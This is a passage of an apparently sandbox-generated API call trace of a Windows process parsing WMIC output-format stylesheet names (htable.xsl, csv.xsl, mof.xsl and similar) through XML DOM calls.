0x0 [0180.203] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.203] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.203] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=5, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.203] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="hform.xsl") returned 0x0 [0180.203] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.203] malloc (_Size=0x18) returned 0x109560 [0180.203] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.203] free (_Block=0x109560) [0180.203] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x60070001c)) returned 0x0 [0180.203] malloc (_Size=0x18) returned 0x109560 [0180.204] malloc (_Size=0x18) returned 0x109580 [0180.204] SysStringLen (param_1="HFORM") returned 0x5 [0180.204] SysStringLen (param_1="TABLE") returned 0x5 [0180.204] SysStringLen (param_1="HFORM") returned 0x5 [0180.204] SysStringLen (param_1="LIST") returned 0x4 [0180.204] SysStringLen (param_1="HFORM") returned 0x5 [0180.204] SysStringLen (param_1="HTABLE") returned 0x6 [0180.204] malloc (_Size=0x30) returned 0x1081c0 [0180.204] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.204] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.204] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.204] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=6, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.204] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="xml.xsl") returned 0x0 [0180.204] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.205] malloc (_Size=0x18) returned 0x1095a0 [0180.205] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.205] free (_Block=0x1095a0) [0180.205] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x60070001c)) returned 0x0 [0180.205] malloc (_Size=0x18) returned 0x1095a0 [0180.205] malloc (_Size=0x18) returned 0x1095c0 [0180.205] SysStringLen (param_1="XML") returned 0x3 [0180.205] SysStringLen (param_1="TABLE") returned 0x5 [0180.205] SysStringLen (param_1="XML") returned 0x3 [0180.205] SysStringLen (param_1="VALUE") returned 0x5 [0180.205] SysStringLen (param_1="VALUE") returned 0x5 [0180.205] SysStringLen (param_1="XML") returned 0x3 [0180.205] malloc (_Size=0x30) returned 0x108200 [0180.205] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.205] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.205] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.205] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=7, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.205] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="mof.xsl") returned 0x0 [0180.205] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.205] malloc (_Size=0x18) returned 0x1095e0 [0180.205] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.206] free (_Block=0x1095e0) [0180.206] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x60070001c)) returned 0x0 [0180.206] malloc (_Size=0x18) returned 0x1095e0 [0180.206] malloc (_Size=0x18) returned 0x109600 [0180.206] SysStringLen (param_1="MOF") returned 0x3 [0180.206] SysStringLen (param_1="TABLE") returned 0x5 [0180.206] SysStringLen (param_1="MOF") returned 0x3 [0180.206] SysStringLen (param_1="LIST") returned 0x4 [0180.206] SysStringLen (param_1="MOF") returned 0x3 [0180.206] SysStringLen (param_1="RAWXML") returned 0x6 [0180.206] SysStringLen (param_1="LIST") returned 0x4 [0180.206] SysStringLen (param_1="MOF") returned 0x3 [0180.206] malloc (_Size=0x30) returned 0x108240 [0180.206] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.206] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.206] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.206] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=8, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.206] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="csv.xsl") returned 0x0 [0180.206] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.206] malloc (_Size=0x18) returned 0x109620 [0180.206] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.206] free (_Block=0x109620) [0180.206] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x60070001c)) returned 0x0 [0180.206] malloc (_Size=0x18) returned 0x109620 [0180.206] malloc (_Size=0x18) returned 0x109640 [0180.206] SysStringLen (param_1="CSV") returned 0x3 [0180.206] SysStringLen (param_1="TABLE") returned 0x5 [0180.207] SysStringLen (param_1="CSV") returned 0x3 [0180.207] SysStringLen (param_1="LIST") returned 0x4 [0180.207] SysStringLen (param_1="CSV") returned 0x3 [0180.207] SysStringLen (param_1="HTABLE") returned 0x6 [0180.207] SysStringLen (param_1="CSV") returned 0x3 [0180.207] SysStringLen (param_1="HFORM") returned 0x5 [0180.207] malloc (_Size=0x30) returned 0x108280 [0180.207] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.207] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.207] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.207] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=9, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.207] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="texttable.xsl") returned 0x0 [0180.207] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.207] malloc (_Size=0x18) returned 0x109660 [0180.207] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.207] free (_Block=0x109660) [0180.207] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x60070001c)) returned 0x0 [0180.207] malloc (_Size=0x18) returned 0x109660 [0180.207] malloc (_Size=0x18) returned 0x109680 [0180.207] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.207] SysStringLen (param_1="TABLE") returned 0x5 [0180.207] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.207] SysStringLen (param_1="VALUE") returned 0x5 [0180.207] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.207] SysStringLen (param_1="XML") returned 0x3 [0180.207] SysStringLen (param_1="XML") returned 0x3 [0180.207] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.207] malloc (_Size=0x30) returned 0x1082c0 [0180.207] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.208] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.208] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.208] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=10, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.208] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="texttable.xsl") returned 0x0 [0180.208] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.208] malloc (_Size=0x18) returned 0x1096a0 [0180.208] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.208] free (_Block=0x1096a0) [0180.208] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x60070001c)) returned 0x0 [0180.208] malloc (_Size=0x18) returned 0x1096a0 [0180.208] malloc (_Size=0x18) returned 0x1096c0 [0180.208] SysStringLen (param_1="texttablewsys") returned 0xd [0180.208] SysStringLen (param_1="TABLE") returned 0x5 [0180.208] SysStringLen (param_1="texttablewsys") returned 0xd [0180.208] SysStringLen (param_1="XML") returned 0x3 [0180.208] SysStringLen (param_1="texttablewsys") returned 0xd [0180.208] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.208] SysStringLen (param_1="XML") returned 0x3 [0180.208] SysStringLen (param_1="texttablewsys") returned 0xd [0180.208] malloc (_Size=0x30) returned 0x108300 [0180.208] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.208] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.208] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.208] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=11, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.208] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="texttable.xsl") returned 0x0 [0180.208] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.209] malloc (_Size=0x18) returned 0x1096e0 [0180.209] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.209] free (_Block=0x1096e0) [0180.209] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x60070001c)) returned 0x0 [0180.209] malloc (_Size=0x18) returned 0x1096e0 [0180.209] malloc (_Size=0x18) returned 0x109700 [0180.209] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.209] SysStringLen (param_1="TABLE") returned 0x5 [0180.209] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.209] SysStringLen (param_1="XML") returned 0x3 [0180.209] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.209] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.209] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.209] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.209] malloc (_Size=0x30) returned 0x108340 [0180.209] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.209] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.209] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.209] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=12, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.209] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="texttable.xsl") returned 0x0 [0180.209] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.209] malloc (_Size=0x18) returned 0x109720 [0180.209] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.209] free (_Block=0x109720) [0180.210] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x60070001c)) returned 0x0 [0180.210] malloc (_Size=0x18) returned 0x109720 [0180.210] malloc (_Size=0x18) returned 0x109740 [0180.210] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0180.210] SysStringLen (param_1="TABLE") returned 0x5 [0180.210] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0180.210] SysStringLen (param_1="XML") returned 0x3 [0180.210] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0180.210] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.210] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0180.210] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.210] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.210] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0180.210] malloc (_Size=0x30) returned 0x108380 [0180.210] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.210] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.210] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.210] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=13, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.210] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="texttable.xsl") returned 0x0 [0180.210] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.210] malloc (_Size=0x18) returned 0x109760 [0180.210] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.210] free (_Block=0x109760) [0180.210] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x60070001c)) returned 0x0 [0180.210] malloc (_Size=0x18) returned 0x109760 [0180.210] malloc (_Size=0x18) returned 0x109780 [0180.210] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0180.211] SysStringLen (param_1="TABLE") returned 0x5 [0180.211] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0180.211] SysStringLen (param_1="XML") returned 0x3 [0180.211] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0180.211] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.211] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0180.211] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.211] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.211] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0180.211] malloc (_Size=0x30) returned 0x1083c0 [0180.211] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.211] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.211] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.211] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=14, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.211] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="texttable.xsl") returned 0x0 [0180.211] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.211] malloc (_Size=0x18) returned 0x1097a0 [0180.211] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.211] free (_Block=0x1097a0) [0180.211] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x60070001c)) returned 0x0 [0180.211] malloc (_Size=0x18) returned 0x1097a0 [0180.211] malloc (_Size=0x18) returned 0x1097c0 [0180.211] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0180.211] SysStringLen (param_1="TABLE") returned 0x5 [0180.211] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0180.211] SysStringLen (param_1="XML") returned 0x3 [0180.211] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0180.211] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.211] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0180.211] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.212] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0180.212] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0180.212] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.212] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0180.212] malloc (_Size=0x30) returned 0x108400 [0180.212] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.212] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.212] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.212] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=15, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.212] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="htable.xsl") returned 0x0 [0180.212] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.212] malloc (_Size=0x18) returned 0x1097e0 [0180.212] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.212] free (_Block=0x1097e0) [0180.212] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x60070001c)) returned 0x0 [0180.212] malloc (_Size=0x18) returned 0x1097e0 [0180.212] malloc (_Size=0x18) returned 0x109800 [0180.212] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0180.212] SysStringLen (param_1="TABLE") returned 0x5 [0180.212] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0180.212] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.212] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0180.212] SysStringLen (param_1="XML") returned 0x3 [0180.212] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0180.212] SysStringLen (param_1="texttablewsys") returned 0xd [0180.212] SysStringLen (param_1="XML") returned 0x3 [0180.212] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0180.212] malloc (_Size=0x30) returned 0x108440 [0180.213] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.213] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.213] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.213] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=16, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.213] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="htable.xsl") returned 0x0 [0180.213] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.213] malloc (_Size=0x18) returned 0x109820 [0180.213] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.213] free (_Block=0x109820) [0180.213] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x60070001c)) returned 0x0 [0180.213] malloc (_Size=0x18) returned 0x109820 [0180.213] malloc (_Size=0x18) returned 0x109840 [0180.213] SysStringLen (param_1="htable-sortby") returned 0xd [0180.213] SysStringLen (param_1="TABLE") returned 0x5 [0180.213] SysStringLen (param_1="htable-sortby") returned 0xd [0180.213] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.213] SysStringLen (param_1="htable-sortby") returned 0xd [0180.213] SysStringLen (param_1="XML") returned 0x3 [0180.213] SysStringLen (param_1="htable-sortby") returned 0xd [0180.213] SysStringLen (param_1="texttablewsys") returned 0xd [0180.213] SysStringLen (param_1="htable-sortby") returned 0xd [0180.213] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0180.213] SysStringLen (param_1="XML") returned 0x3 [0180.213] SysStringLen (param_1="htable-sortby") returned 0xd [0180.213] malloc (_Size=0x30) returned 0x108480 [0180.213] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.213] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.213] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.213] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=17, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.214] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="mof.xsl") returned 0x0 [0180.214] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.214] malloc (_Size=0x18) returned 0x109860 [0180.214] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.214] free (_Block=0x109860) [0180.214] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x60070001c)) returned 0x0 [0180.214] malloc (_Size=0x18) returned 0x109860 [0180.214] malloc (_Size=0x18) returned 0x109880 [0180.214] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0180.214] SysStringLen (param_1="TABLE") returned 0x5 [0180.214] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0180.214] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.214] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0180.214] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.214] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0180.214] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0180.214] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.214] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0180.214] malloc (_Size=0x30) returned 0x1084c0 [0180.214] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.214] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.214] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.214] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=18, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.214] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="mof.xsl") returned 0x0 [0180.214] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.214] malloc (_Size=0x18) returned 0x1098a0 [0180.215] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.215] free (_Block=0x1098a0) [0180.215] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x60070001c)) returned 0x0 [0180.215] malloc (_Size=0x18) returned 0x1098a0 [0180.215] malloc (_Size=0x18) returned 0x1098c0 [0180.215] SysStringLen (param_1="wmiclimofformat") returned 0xf [0180.215] SysStringLen (param_1="TABLE") returned 0x5 [0180.215] SysStringLen (param_1="wmiclimofformat") returned 0xf [0180.215] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.215] SysStringLen (param_1="wmiclimofformat") returned 0xf [0180.215] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.215] SysStringLen (param_1="wmiclimofformat") returned 0xf [0180.215] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0180.215] SysStringLen (param_1="wmiclimofformat") returned 0xf [0180.215] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0180.215] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.215] SysStringLen (param_1="wmiclimofformat") returned 0xf [0180.215] malloc (_Size=0x30) returned 0x108500 [0180.215] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.215] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.215] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.215] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=19, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.215] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="textvaluelist.xsl") returned 0x0 [0180.215] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.215] malloc (_Size=0x18) returned 0x1098e0 [0180.215] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.215] free (_Block=0x1098e0) [0180.216] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x60070001c)) returned 0x0 [0180.216] malloc (_Size=0x18) returned 0x1098e0 [0180.216] malloc (_Size=0x18) returned 0x109900 [0180.216] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0180.216] SysStringLen (param_1="TABLE") returned 0x5 [0180.216] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0180.216] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0180.216] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0180.216] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0180.216] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0180.216] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0180.216] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0180.216] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0180.216] malloc (_Size=0x30) returned 0x108540 [0180.216] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.216] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.216] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.216] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=20, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.216] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="textvaluelist.xsl") returned 0x0 [0180.216] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.216] malloc (_Size=0x18) returned 0x109920 [0180.216] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.216] free (_Block=0x109920) [0180.216] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | 